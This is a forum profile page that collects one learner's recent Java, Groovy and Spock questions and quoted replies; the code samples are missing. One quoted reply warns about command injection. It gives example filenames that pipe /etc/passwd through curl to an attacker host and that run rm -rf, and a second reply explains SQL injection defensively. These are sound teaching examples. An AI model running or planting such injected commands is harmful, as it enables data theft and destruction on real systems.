Lisa Austin

Ranch Hand
+ Follow
since Jun 04, 2015
Merit badge: grant badges
For More
Cows and Likes
Cows
Total received
6
In last 30 days
0
Total given
0
Likes
Total received
7
Received in last 30 days
0
Total given
101
Given in last 30 days
1
Forums and Threads
Scavenger Hunt
expand Ranch Hand Scavenger Hunt
expand Greenhorn Scavenger Hunt

Recent posts by Lisa Austin

Campbell Ritchie wrote:
Yes; it's good to see you back


Thank you very much Ritchie for the advice.  I do not know why I was completely blind to the fact that I was extending Throwable vs. what the instructor was doing.  Great information as always.  You have always been a great instructor and I'm lucky there are people like you out there to help people like me.
7 months ago
Hi there!  It's been a while .  

Could someone please explain to me why my Intellij IDE flagged what I did as an error when I was copying what the instructor did in her own code?


I'm trying to learn Spock and I'm following a Youtube video here https://www.youtube.com/watch?v=i5Qu3qYOfsM .

She provides her whole code set in git but I'm following along writing the code out myself and only using her code in case I get stuck.

In the video the instructor has a class "Polygon"  and a "TooFewSidesException" class under package com.mechanitis.demo.spock

Her Polygon constructor has the "throw new TooFewSidesException" .   Full code is after my question but this is a snippet of what I'm talking about.




MY intellij didn't like it when I followed her example ( didn't like = red light bulb and squiggly line ) .  I took it's suggestion and it added the "throws TooFewSidesException" to the constructor.   Any idea why my intellij insists on the method having  "throws TooFewSidesException" when her code is just fine without it?

My Java is 11 ( 11.0.6_10 )  and her's is 11.0.9  if that makes the difference.    Thank You!










Instructor's Polygon class.








Instructor's TooFewSidesException class






MY Polygon Class





MY TooFewSidesException class ( just a start )


7 months ago

Matthew Bendford wrote:Another common type of attack vector should also get mentioned: SQL injection.
It's pretty much the same idea: Unfortunately many beginner level tutorials, teachers and books commonly use simple string concatination to piece together sql queries. This works with provided sample data but already breaks on something common as a forum. The english language commonly uses both types of quote-marks: The single quote ' and the double quote ". If you now try to store this very line in a database one of them is used as delimiter character - and when encountered unexpected means end of input string which corrupts the sql query and the best case is an error returned from the database.
If you manipulate an input to a vulnerable qurry in a specific way you can get any sort of result from wiping the database over free access to leak its content.
So to get around this you have to sanitize the user input and properly build your query. One part of it is to use PreparedStatements. The query is done with placeholder characters (usually the question mark ?) and the values are filled with setters. This is also a way of type safety: If you expect a numerical value but you get a letter or other symbol the setter alrwady fail fast building the sql query before anything is ever send to the database.
An additional way of user input sanitization is limit the input characters. For a name there's a reason for a single dash - but a double dash -- (the sql comment marker to ignore the rest of the query srring) doesn't make sense. This can be a simple typo - but can also be an attacker trying to forge a bad query. You should reject such a name even before building the query as the input already looks too suspicious.
This list goes one for quite some lines. Atracker found all crazy issues over the decades like what's called a reverse shell abusing a bug in the apache web server or the recent log4j (which I became a victim of). The overall gist is: NEVER trust the user input. Always pre-check and validate and sanitize it and don't use simple string concatination if other methods are available like varargs methods for execute sub-processes, prepared statements for sql or simple I/O like a file by using a languages internal api rather then rely on a potential flawed shell command.



Thank You!  Yes this was in another of their lessons.  Thank you though for this info.  
1 year ago

Ron McLeod wrote:
I'm not sure if this helps, but the approach above is vulnerable to command injection if the username or filename originated from an untrusted and unsanitized source.  Data could be exfiltrated using a file name like:
   "my-file; cat /etc/passwd | curl -X POST  https://attackersite.com --data @-"

or data deleted with a filename like:
   "my-file; rm -rf /path/to/valuable/stuff"

since you are passing a raw command string to the OS shell to process.




Thank you!!  That did help.  I was completely focused on something else and got it.  But yes!!  I put the filename in an ArrayList and then created a fil using a boolean method .  I just needed to focus on the file and user .  SMH.  I get so stuck sometimes on a certain idea .
1 year ago
I'm going through some training as a requirement for my company and there are two sections that just have me stump.  This one I've tried and tried to figure it out but I don't get it.
It says



The two common ways to directly protect against command injection:

If available, use parameterized functions that enforce the separation between arguments and the command such as a write() function instead of eval, process, shell_exec, or system. This is the best way to protect against command injection.

You can use a regular expression library of the specific language to filter out dangerous OS injection syntax, but this is hard to do correctly and not recommended.

The best method to prevent command injection vulnerabilities is to use parameterized functions. In the case of writing a file, instead of doing writing via OS commands (e.g. touch) you can use the languages native write functionality.

Examples in different languages are below.




Example for Java is











This is confusing me.

Touch is usually for files not directories I thought but "tmp/" looks like a directory so I assume that I'm "touch"ing the filename ( creating a new file under an existing directory tmp/username/filename)

createNewFile(); is a boolean so I'm not really sure how to use this in the p = Runtime.getRuntime().exec() or should I keep that at all?     My ASSUMPTION is if the file "filename" is created successfully by using new File () then I would use the Runtime.getRuntime().exec() to execute the createNewfile() but that doesn't make sense.  




Any hint would be appreciated.  I've failed this about 25 times now LOL.

1 year ago
In the oracle tutorials  ( https://docs.oracle.com/javase/tutorial/essential/io/notification.html )  the example they use for here uses the for loop without any values?  I get it normally is

for (initialization; termination;
    increment) {
   statement(s)
}


So am I correct in thinking this creates a never ending loop?    

My other question is about the WatchKey .  Here I see it get initialized twice.  First at line 5 then at 19.    I'm trying to picture what this looks like to understand it.    Is the key at 5 and 19 two separate objects?

1 year ago
So I think I may have figured out how to use the find{} with this.   Thank You
3 years ago
I'm trying to learn groovy and spock . I'm wondering if someone could help me with this?

I have a list of maps with key "color" and want to verify each map's value individually.




The key "KeyID" is unique where all other keys can have duplicate values.  When a value is always the same I have used "every{}" to verify the value for a key. Example the value for the key "load" is always 9999.
But what I can't figure out is when the value can be different for a key?  I am wonder if there is a way to reference / filter on the unique value of KeyID first THEN verify the other key for each map?


3 years ago

Zachary Griggs wrote:I compile all my projects in 1.8. Example:

This should work with Java 8. If this is the way your pom is currently setup, then you probably just need to download the SDK.

Locally:
File -> Project Structure -> Project SDK
If the SDK version isn't compatible with java 1.8, you'll see a lot of errors

You should be able to use Java 1.8 with Amazon Coretto Java 8. That would be a change on the machine to install that SDK and use it, probably. I'd imagine it would be on some sort of build server. Do you use Jenkins?



Thank You.  I was just confused I think by what was being asked by my mentor.  Things seem like it should be simple but if it's too simple it seems wrong. LOL.  Thanks for confirming for me.
3 years ago
I hope Beginning Java is okay for this question.  I'm trying to learn Spring and SpringBoot . I have a mentor who has me learning by working on a small project and one task I was given has confused me but I won't meet with him until Friday.  I can email but I just want to run this by someone before I bring it up to him because I think I may have missed something.

I need to change the application's Java version from 1.8 to Amazon Corretto 8.
Maven currently has the maven-compiler-plugin configuration set with source = 1.8 and target = 1.8.

When I was Googling for information about this it looks like this is just set in the project's IDE or I guess the machine it's being built on?  So it's not a POM change ?

https://unix.stackexchange.com/questions/548172/maven-compiler-version-for-amazon-corretto





3 years ago
Thanks guys.  I'll give it a go from this.
3 years ago
I'm on another codewar problem here https://www.codewars.com/kata/54521e9ec8e60bc4de000d6c/train/java

The problem is to find the subset of continuous values which adds up to being the highest value.   The example here is



So the values 4, -1, 2, 1  add up to be the highest value which is 6.
If the int array is all positive then just add up the entire array.
If all negative values then return 0.
If it's an empty array return 0


I think I understand an all positive array, an all negative and an empty.  I figure I would iterate over and test the values as to whether they are all over 0 , all under 0 or empty but if there is a mix of values I'm a bit stumped as to what the best solution is.


I keep thinking of ways that I maybe able to solve this when there is a combination of both positive and negative numbers but most of them seem complicated and most likely NOT the correct way .   Is there any tips someone can give me as to what maybe the best solution?  

On paper I can come up with a few ideas but none seem ideal or when I test the idea I see an issue with it.











3 years ago

Junilu Lacar wrote:Line 13 accesses the parameter b directly and since Arrays.sort() does so in place, the array in the calling code will experience the side effect of being sorted after the call is made. That is, if the array b is unsorted before the call to comp(), it will be sorted after. That's kind of a no-no since it's a side-effect that you wouldn't normally expect to happen nor necessarily want to happen.



So to not access the parameter b directory then I need to create a new int[] array and assign it the value b before sorting?
3 years ago

Junilu Lacar wrote:

Lisa Austin wrote: I was thinking mine maybe better because I'm checking for more than just null arrays?


Your code actually gives incorrect results per this requirement: "If a or b are nil (or null or None), the problem doesn't make sense so return false."

Your code will return true if a and b are null.



Interesting.  I didn't catch that requirement AND I passed all the tests .  I probably should report it to CodeWars.  Thank you for pointing it out to me.
3 years ago

Campbell Ritchie wrote:Isn't it a quicksort for an int[]? In which case wouldn't the memory requirement be the same as that for the original array?
I think trying to find whether two arrays are anagrams of each other can readily be done by sorting. Probably a simpler and therefore less error‑prone solution than some others. What solutions did other people propose themselves?



My solution ( but slightly different ) was voted as best practice but the discussion about how sorting isn't cheap was under it.  Then it was discussed under the second most "Best Practice" and a suggestion to use a HashMap or a non-comparative sort such as Radix Sort .    

What do you think of my solution vs the first place "Best Practice" ?  It's similar I know so maybe not much can be said.  I was thinking mine maybe better because I'm checking for more than just null arrays ?




This was voted second as  "Best Practices" but a lot of disagreements as well.

3 years ago